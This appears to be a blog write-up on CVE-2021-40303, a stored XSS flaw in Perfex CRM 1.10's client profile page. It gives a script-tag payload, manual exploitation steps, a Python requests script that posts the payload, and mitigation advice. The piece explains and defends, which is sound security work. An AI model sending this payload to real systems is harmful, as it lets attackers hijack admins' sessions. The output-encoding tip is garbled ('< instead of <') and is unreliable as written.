Perfex CRM is a popular open-source Customer Relationship Management tool used by many businesses to manage clients and projects. In 2021, a critical security issue, tracked as CVE-2021-40303, was discovered in Perfex CRM version 1.10. This vulnerability allows attackers to execute Cross Site Scripting (XSS) attacks via the /clients/profile endpoint. In this post, I’ll break down how this flaw works, show a simple code proof-of-concept, and explain how you can avoid falling victim.
What Is XSS and Why Does It Matter?
Cross Site Scripting (XSS) lets attackers inject malicious scripts into websites visited by other users. If they succeed, attackers can steal session cookies, impersonate users, deface pages, or redirect to malicious sites. XSS is especially dangerous in software like Perfex CRM because it often holds sensitive customer data.
The Exploit Path
The vulnerable version (Perfex CRM 1.10) fails to properly sanitize input on the /clients/profile page. Here’s how the vulnerability works:
A user updates their client profile.
- If the profile fields (like "company", "address", etc.) include malicious JavaScript code, the application saves them in the database without sanitizing.
- When someone else (e.g., a CRM admin or support agent) later views the client profile, the stored JavaScript is executed in their browser.
Why Does This Happen?
The application directly renders user-provided data in profile fields into the webpage’s HTML, but doesn’t escape or remove HTML tags or JavaScript.
## Proof-of-Concept: Exploiting XSS in /clients/profile
Below is a step-by-step example of how an attacker could exploit this bug.
Let’s say you edit your company name and set it to
"><script>alert('XSS in Perfex!');</script>
Log in as a client (or any user allowed to edit profiles).
2. Go to: /clients/profile.
3. Set any editable field to: "><script>alert('XSS in Perfex!');</script>
Save your changes.
5. Now, whenever someone (including admins) views your profile, their browser will show the alert, proving code execution.
Simple Python Request Example (Proof of Concept)
Here’s a simple Python snippet to automate this with the requests library (assuming you have a valid session cookie):
import requests
# Your session cookie for authentication
cookies = {
'ci_session': 'your-session-id-here'
}
# The server URL and vulnerable endpoint
url = 'https://target-crm.com/clients/profile';
# Form data with malicious input
data = {
'company': '"><script>alert("XSS in Perfex!");</script>',
# Add other required fields as needed...
}
response = requests.post(url, cookies=cookies, data=data)
print("Status:", response.status_code)
What Happens Next?
Once the attacker’s data is saved, any user who loads /clients/profile for this client gets their browser code hijacked.
If you use Perfex CRM
- Upgrade: Ensure you're using the latest version where this bug is patched.
- Sanitize Input: Always strip or escape HTML/JS from user input before saving to the database.
- Output Encoding: When displaying user data, encode up to HTML standards (e.g., < instead of <).
Original References
- CVE-2021-40303 on NVD
- Exploit details on Exploit-DB
- Perfex CRM Official Site
Summary
CVE-2021-40303 highlights the risk of XSS in business apps like Perfex CRM. If you're using any CRM (not just Perfex), always be cautious with user-generated content and keep your software up to date.
Timeline
Published on: 11/08/2022 18:15:00 UTC
Last modified on: 11/09/2022 03:00:00 UTC